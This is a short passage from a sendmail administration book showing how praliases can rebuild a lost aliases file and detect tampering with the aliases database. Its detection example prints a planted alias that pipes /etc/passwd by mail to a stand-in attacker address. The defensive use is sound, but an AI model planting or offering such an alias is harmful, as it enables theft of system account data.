Some Examples of Using praliases

One handy application for praliases is to recover your original source text file when it disappears. If, for example, your /etc/mail/aliases file is accidently removed, but your database remains intact as /etc/mail/aliases.db, you can regenerate a new source file with commands such as this one:

# cd /etc/mail
# praliases | sed -e '/^@:@$/d' > aliases
# newaliases

Naturally, such a recovery should never be necessary if your machine is properly backed up, and if you keep your source files under some form of revision control, such as rcs(1).

Another handy application of praliases is to see whether someone has slipped something into your aliases database that was not in the original file. Consider the following steps and the result they reveal:

# cd /etc/mail
# praliases | sed -e '/^@:@$/d'| sort > /tmp/a
# makemap hash /tmp/aliases < aliases
# praliases -f /tmp/aliases | sort > /tmp/b
# diff /tmp/a /tmp/b
> pw:"|cat /etc/passwd|/usr/ucb/mail badguy@bad.domain && exit 0"

Here, we first dump the aliases database and save a copy in /tmp/a. Then we create a database from the aliases source file using makemap instead of newaliases and dump that database with makemap into /tmp/b. A diff reveals that someone has added an entry to the aliases database that did not exist in the aliases source file. That entry is an attempt to steal the system /etc/passwd file whenever the badguy likes.

Get sendmail, 4th Edition now with O’Reilly online learning.

O’Reilly members experience live online training, plus books, videos, and digital content from 200+ publishers.